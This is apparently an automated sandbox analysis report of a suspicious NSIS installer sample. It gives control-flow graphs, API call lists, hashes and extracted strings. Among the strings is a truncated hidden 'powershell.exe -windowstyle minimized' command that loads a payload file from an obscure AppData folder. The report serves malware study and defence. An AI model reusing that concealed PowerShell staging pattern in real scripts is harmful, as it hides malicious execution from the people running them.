                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: "C:\Users\user\Desktop\yMXFgPOdf2.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$@>C$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                  • API String ID: 914957316-157549689
                                                                  • Opcode ID: 32e94d17401de2a7c1f379b3f747c88ae1515776f88dc3b4970cf19dbaf980bf
                                                                  • Instruction ID: 9058ea0fac2f7b5828f11579708a501ddeab19906f501c4d7d338e07c4ff49df
                                                                  • Opcode Fuzzy Hash: 32e94d17401de2a7c1f379b3f747c88ae1515776f88dc3b4970cf19dbaf980bf
                                                                  • Instruction Fuzzy Hash: 2761B871600700AFD720BF669D46F2B3A6CEB84B4AF50443FF940B62E1CBB95941CA2D

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 238 403b0e-403b20 239 403c61-403c70 238->239 240 403b26-403b2c 238->240 242 403c72-403cba GetDlgItem * 2 call 403fe6 SetClassLongW call 40140b 239->242 243 403cbf-403cd4 239->243 240->239 241 403b32-403b3b 240->241 244 403b50-403b53 241->244 245 403b3d-403b4a SetWindowPos 241->245 242->243 247 403d14-403d19 call 404032 243->247 248 403cd6-403cd9 243->248 250 403b55-403b67 ShowWindow 244->250 251 403b6d-403b73 244->251 245->244 257 403d1e-403d39 247->257 253 403cdb-403ce6 call 401389 248->253 254 403d0c-403d0e 248->254 250->251 258 403b75-403b8a DestroyWindow 251->258 259 403b8f-403b92 251->259 253->254 269 403ce8-403d07 SendMessageW 253->269 254->247 256 403fb3 254->256 264 403fb5-403fbc 256->264 262 403d42-403d48 257->262 263 403d3b-403d3d call 40140b 257->263 265 403f90-403f96 258->265 267 403b94-403ba0 SetWindowLongW 259->267 268 403ba5-403bab 259->268 272 403f71-403f8a DestroyWindow EndDialog 262->272 273 403d4e-403d59 262->273 263->262 265->256 270 403f98-403f9e 265->270 267->264 274 403bb1-403bc2 GetDlgItem 268->274 275 403c4e-403c5c call 40404d 268->275 269->264 270->256 279 403fa0-403fa9 ShowWindow 270->279 272->265 273->272 280 403d5f-403dac call 405dc3 call 403fe6 * 3 GetDlgItem 273->280 276 403be1-403be4 274->276 277 403bc4-403bdb SendMessageW IsWindowEnabled 274->277 275->264 281 403be6-403be7 276->281 282 403be9-403bec 276->282 277->256 277->276 279->256 308 403db6-403df2 ShowWindow KiUserCallbackDispatcher call 404008 EnableWindow 280->308 309 403dae-403db3 280->309 285 403c17-403c1c call 403fbf 281->285 286 403bfa-403bff 282->286 287 403bee-403bf4 282->287 285->275 289 403c35-403c48 SendMessageW 286->289 291 403c01-403c07 286->291 287->289 290 403bf6-403bf8 287->290 289->275 290->285 294 403c09-403c0f call 40140b 291->294 295 403c1e-403c27 call 40140b 291->295 306 403c15 294->306 295->275 304 403c29-403c33 295->304 304->306 306->285 312 403df4-403df5 308->312 313 403df7 308->313 309->308 314 403df9-403e27 GetSystemMenu EnableMenuItem SendMessageW 312->314 313->314 315 403e29-403e3a SendMessageW 314->315 316 403e3c 314->316 317 403e42-403e80 call 40401b call 405da1 lstrlenW call 405dc3 SetWindowTextW call 401389 315->317 316->317 317->257 326 403e86-403e88 317->326 326->257 327 403e8e-403e92 326->327 328 403eb1-403ec5 DestroyWindow 327->328 329 403e94-403e9a 327->329 328->265 331 403ecb-403ef8 CreateDialogParamW 328->331 329->256 330 403ea0-403ea6 329->330 330->257 332 403eac 330->332 331->265 333 403efe-403f55 call 403fe6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 331->333 332->256 333->256 338 403f57-403f6a ShowWindow call 404032 333->338 340 403f6f 338->340 340->265
                                                                  APIs
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B4A
                                                                  • ShowWindow.USER32(?), ref: 00403B67
                                                                  • DestroyWindow.USER32 ref: 00403B7B
                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403B97
                                                                  • GetDlgItem.USER32(?,?), ref: 00403BB8
                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403BCC
                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403BD3
                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403C81
                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403C8B
                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403CA5
                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403CF6
                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403D9C
                                                                  • ShowWindow.USER32(00000000,?), ref: 00403DBD
                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DCF
                                                                  • EnableWindow.USER32(?,?), ref: 00403DEA
                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E00
                                                                  • EnableMenuItem.USER32(00000000), ref: 00403E07
                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403E1F
                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403E32
                                                                  • lstrlenW.KERNEL32(0042D1F8,?,0042D1F8,00433EA0), ref: 00403E5B
                                                                  • SetWindowTextW.USER32(?,0042D1F8), ref: 00403E6F
                                                                  • ShowWindow.USER32(?,0000000A), ref: 00403FA3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                  • String ID:
                                                                  • API String ID: 3282139019-0
                                                                  • Opcode ID: faeace5642cdda3558d84447fe0703c4348c0d149e23cdb61c619dc2470e19a1
                                                                  • Instruction ID: 60ca7c1d91bee6f8242d2bed331db898ad50b25bc51b1c46c45c1ad212b6c09a
                                                                  • Opcode Fuzzy Hash: faeace5642cdda3558d84447fe0703c4348c0d149e23cdb61c619dc2470e19a1
                                                                  • Instruction Fuzzy Hash: B6C1DD71904205ABDB216F61EE86E2A3E7CFB4570AF14053EF641B11E0CB799A42DB2D

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 341 402d67-402db5 GetTickCount GetModuleFileNameW call 405a0d 344 402dc1-402def call 405da1 call 405838 call 405da1 GetFileSize 341->344 345 402db7-402dbc 341->345 353 402df5 344->353 354 402edc-402eea call 402d03 344->354 346 402f99-402f9d 345->346 356 402dfa-402e11 353->356 360 402eec-402eef 354->360 361 402f3f-402f44 354->361 358 402e13 356->358 359 402e15-402e1e call 4031c8 356->359 358->359 368 402e24-402e2b 359->368 369 402f46-402f4e call 402d03 359->369 363 402ef1-402f09 call 4031de call 4031c8 360->363 364 402f13-402f3d GlobalAlloc call 4031de call 402fa0 360->364 361->346 363->361 391 402f0b-402f11 363->391 364->361 390 402f50-402f61 364->390 373 402ea7-402eab 368->373 374 402e2d-402e41 call 4059c8 368->374 369->361 379 402eb5-402ebb 373->379 380 402ead-402eb4 call 402d03 373->380 374->379 388 402e43-402e4a 374->388 381 402eca-402ed4 379->381 382 402ebd-402ec7 call 4061b9 379->382 380->379 381->356 389 402eda 381->389 382->381 388->379 394 402e4c-402e53 388->394 389->354 395 402f63 390->395 396 402f69-402f6e 390->396 391->361 391->364 394->379 397 402e55-402e5c 394->397 395->396 398 402f6f-402f75 396->398 397->379 399 402e5e-402e65 397->399 398->398 400 402f77-402f92 SetFilePointer call 4059c8 398->400 399->379 401 402e67-402e87 399->401 404 402f97 400->404 401->361 403 402e8d-402e91 401->403 405 402e93-402e97 403->405 406 402e99-402ea1 403->406 404->346 405->389 405->406 406->379 407 402ea3-402ea5 406->407 407->379
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00402D78
                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\yMXFgPOdf2.exe,00000400,?,?,?,00000000,0040344F,?), ref: 00402D94
                                                                    • Part of subcall function 00405A0D: GetFileAttributesW.KERNELBASE(00000003,00402DA7,C:\Users\user\Desktop\yMXFgPOdf2.exe,80000000,00000003,?,?,?,00000000,0040344F,?), ref: 00405A11
                                                                    • Part of subcall function 00405A0D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,0040344F,?), ref: 00405A33
                                                                  • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\yMXFgPOdf2.exe,C:\Users\user\Desktop\yMXFgPOdf2.exe,80000000,00000003,?,?,?,00000000,0040344F,?), ref: 00402DE0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                  • String ID: "C:\Users\user\Desktop\yMXFgPOdf2.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\yMXFgPOdf2.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                  • API String ID: 4283519449-344116923
                                                                  • Opcode ID: 2e3c47bfa60127b1afce542dec9d1826138b9062359befd6d0ef1f45db9145ec
                                                                  • Instruction ID: 2344981239cccc2d9a157a4bc97fadfb01f0662fe41213100d9ed930206fcb3f
                                                                  • Opcode Fuzzy Hash: 2e3c47bfa60127b1afce542dec9d1826138b9062359befd6d0ef1f45db9145ec
                                                                  • Instruction Fuzzy Hash: 2451D171900215AFDB109FA5DE89B9F7AB8FB04359F20413BF904B62D1C7B89D408BAD

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 534 401752-401777 call 402b38 call 405863 539 401781-401793 call 405da1 call 4057ec lstrcatW 534->539 540 401779-40177f call 405da1 534->540 545 401798-401799 call 406035 539->545 540->545 549 40179e-4017a2 545->549 550 4017a4-4017ae call 4060e4 549->550 551 4017d5-4017d8 549->551 558 4017c0-4017d2 550->558 559 4017b0-4017be CompareFileTime 550->559 553 4017e0-4017fc call 405a0d 551->553 554 4017da-4017db call 4059e8 551->554 561 401870-401899 call 40504b call 402fa0 553->561 562 4017fe-401801 553->562 554->553 558->551 559->558 575 4018a1-4018ad SetFileTime 561->575 576 40189b-40189f 561->576 564 401852-40185c call 40504b 562->564 565 401803-401841 call 405da1 * 2 call 405dc3 call 405da1 call 40557d 562->565 577 401865-40186b 564->577 565->549 597 401847-401848 565->597 580 4018b3-4018be CloseHandle 575->580 576->575 576->580 578 4029ce 577->578 581 4029d0-4029d4 578->581 583 4018c4-4018c7 580->583 584 4029c5-4029c8 580->584 586 4018c9-4018da call 405dc3 lstrcatW 583->586 587 4018dc-4018df call 405dc3 583->587 584->578 593 4018e4-402241 call 40557d 586->593 587->593 593->581 593->584 597->577 599 40184a-40184b 597->599 599->564
                                                                  APIs
                                                                  • lstrcatW.KERNEL32(00000000,00000000,"powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\br,C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens,?,?,00000031), ref: 00401793
                                                                  • CompareFileTime.KERNEL32(-00000014,?,"powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\br,"powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\br,00000000,00000000,"powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\br,C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens,?,?,00000031), ref: 004017B8
                                                                    • Part of subcall function 00405DA1: lstrcpynW.KERNEL32(?,?,00000400,00403297,00433EA0,NSIS Error), ref: 00405DAE
                                                                    • Part of subcall function 0040504B: lstrlenW.KERNEL32(Completed,00000000,0041BB2D,759223A0,?,?,?,?,?,?,?,?,?,00403103,00000000,?), ref: 00405083
                                                                    • Part of subcall function 0040504B: lstrlenW.KERNEL32(00403103,Completed,00000000,0041BB2D,759223A0,?,?,?,?,?,?,?,?,?,00403103,00000000), ref: 00405093
                                                                    • Part of subcall function 0040504B: lstrcatW.KERNEL32(Completed,00403103,00403103,Completed,00000000,0041BB2D,759223A0), ref: 004050A6
                                                                    • Part of subcall function 0040504B: SetWindowTextW.USER32(Completed,Completed), ref: 004050B8
                                                                    • Part of subcall function 0040504B: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004050DE
                                                                    • Part of subcall function 0040504B: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050F8
                                                                    • Part of subcall function 0040504B: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405106
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                  • String ID: "powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\br$C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens$C:\Windows\resources\0809\spaciousness\krjning.dll
                                                                  • API String ID: 1941528284-3944743889
                                                                  • Opcode ID: a136ea5669a7d7d0161c1cd16082336334043ff9ed154f659fcf1137da06a460
                                                                  • Instruction ID: e0c9a0707421b0566b50a086881e387c24033da95965c7c775ca149cf8f14c82
                                                                  • Opcode Fuzzy Hash: a136ea5669a7d7d0161c1cd16082336334043ff9ed154f659fcf1137da06a460
                                                                  • Instruction Fuzzy Hash: EA418071900518BACF116BB5DC4ADAF7679EF45368B20823BF421B10E1D73C8A519A6D

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 600 40504b-405060 601 405066-405077 600->601 602 405117-40511b 600->602 603 405082-40508e lstrlenW 601->603 604 405079-40507d call 405dc3 601->604 606 405090-4050a0 lstrlenW 603->606 607 4050ab-4050af 603->607 604->603 606->602 610 4050a2-4050a6 lstrcatW 606->610 608 4050b1-4050b8 SetWindowTextW 607->608 609 4050be-4050c2 607->609 608->609 611 4050c4-405106 SendMessageW * 3 609->611 612 405108-40510a 609->612 610->607 611->612 612->602 613 40510c-40510f 612->613 613->602
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(Completed,00000000,0041BB2D,759223A0,?,?,?,?,?,?,?,?,?,00403103,00000000,?), ref: 00405083
                                                                  • lstrlenW.KERNEL32(00403103,Completed,00000000,0041BB2D,759223A0,?,?,?,?,?,?,?,?,?,00403103,00000000), ref: 00405093
                                                                  • lstrcatW.KERNEL32(Completed,00403103,00403103,Completed,00000000,0041BB2D,759223A0), ref: 004050A6
                                                                  • SetWindowTextW.USER32(Completed,Completed), ref: 004050B8
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004050DE
                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050F8
                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405106
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                  • String ID: Completed
                                                                  • API String ID: 2531174081-3087654605
                                                                  • Opcode ID: de5bbd2ec47a5afdc2151420ab1ec2db132e359724651f026e52d768b98c2cc9
                                                                  • Instruction ID: 18f0b212c8a37fbfd9ea408b4b1fd2a272b642164fc692df639cd20d24458be7
                                                                  • Opcode Fuzzy Hash: de5bbd2ec47a5afdc2151420ab1ec2db132e359724651f026e52d768b98c2cc9
                                                                  • Instruction Fuzzy Hash: 56219D71900518BADB11AF95DD85EDFBFB9EF84314F10807AF904B62A1C3794A40CFA8

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 614 402fa0-402fb9 615 402fc2-402fca 614->615 616 402fbb 614->616 617 402fd3-402fd8 615->617 618 402fcc 615->618 616->615 619 402fe8-402ff5 call 4031c8 617->619 620 402fda-402fe3 call 4031de 617->620 618->617 624 403175 619->624 625 402ffb-402fff 619->625 620->619 628 403177-403178 624->628 626 403005-40304c GetTickCount 625->626 627 40315e-403160 625->627 631 403052-40305a 626->631 632 4031be 626->632 629 403162-403165 627->629 630 4031b4-4031b7 627->630 633 4031c1-4031c5 628->633 636 403167 629->636 637 40316a-403173 call 4031c8 629->637 634 4031b9 630->634 635 40317a-403180 630->635 638 40305c 631->638 639 40305f-40306d call 4031c8 631->639 632->633 634->632 642 403182 635->642 643 403185-403193 call 4031c8 635->643 636->637 637->624 647 4031bb 637->647 638->639 639->624 648 403073-40307c 639->648 642->643 643->624 651 403195-4031a7 WriteFile 643->651 647->632 650 403082-4030a2 call 406227 648->650 657 403156-403158 650->657 658 4030a8-4030bb GetTickCount 650->658 653 4031a9-4031ac 651->653 654 40315a-40315c 651->654 653->654 656 4031ae-4031b1 653->656 654->628 656->630 657->628 659 403106-40310a 658->659 660 4030bd-4030c5 658->660 663 40314b-40314e 659->663 664 40310c-40310f 659->664 661 4030c7-4030cb 660->661 662 4030cd-4030fe MulDiv wsprintfW call 40504b 660->662 661->659 661->662 669 403103 662->669 663->631 668 403154 663->668 666 403131-40313c 664->666 667 403111-403125 WriteFile 664->667 671 40313f-403143 666->671 667->654 670 403127-40312a 667->670 668->632 669->659 670->654 672 40312c-40312f 670->672 671->650 673 403149 671->673 672->671 673->632
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 0040300B
                                                                  • GetTickCount.KERNEL32 ref: 004030B0
                                                                  • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004030D9
                                                                  • wsprintfW.USER32 ref: 004030EC
                                                                  • WriteFile.KERNELBASE(00000000,00000000,0041BB2D,00402F3A,00000000), ref: 0040311D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_yMXFgPOdf2.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$FileWritewsprintf
                                                                  • String ID: ... %d%%
                                                                  • API String ID: 4209647438-2449383134
                                                                  • Opcode ID: 567d16c84bc26e35b56de6a991f7c1d851492a15168b7d80d9f2dbebfc4257a8
                                                                  • Instruction ID: edebebcb9cc5efd3ffb8aa1a5e3cca2c022cdf8913c1b450003ecc800609919e
                                                                  • Opcode Fuzzy Hash: 567d16c84bc26e35b56de6a991f7c1d851492a15168b7d80d9f2dbebfc4257a8
                                                                  • Instruction Fuzzy Hash: 78615971900219EBCF10DF65DA84A9F7FB8AF08312F14457BE814BB2D0D7789A50CBA9

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 674 4015b9-4015cd call 402b38 call 405897 679 401614-401617 674->679 680 4015cf-4015eb call 405819 CreateDirectoryW 674->680 681 401646-402195 call 401423 679->681 682 401619-401638 call 401423 call 405da1 SetCurrentDirectoryW 679->682 689 40160a-401612 680->689 690 4015ed-4015f8 GetLastError 680->690 695 402791-402798 681->695 696 4029c5-4029d4 681->696 682->696 699 40163e-401641 682->699 689->679 689->680 693 401607 690->693 694 4015fa-401605 GetFileAttributesW 690->694 693->689 694->689 694->693 695->696 699->696
                                                                  APIs
                                                                    • Part of subcall function 00405897: CharNextW.USER32(?,?,0042FA00,?,0040590B,0042FA00,0042FA00,?,?,75923420,00405649,?,C:\Users\user\AppData\Local\Temp\,75923420,"C:\Users\user\Desktop\yMXFgPOdf2.exe"), ref: 004058A5
                                                                    • Part of subcall function 00405897: CharNextW.USER32(00000000), ref: 004058AA
                                                                    • Part of subcall function 00405897: CharNextW.USER32(00000000), ref: 004058C2
                                                                  • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                  • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens,?,00000000,000000F0), ref: 00401630
                                                                  Strings
                                                                  • C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens, xrefs: 00401623
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2102020369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2101995299.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102054437.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102076901.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2102276441.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
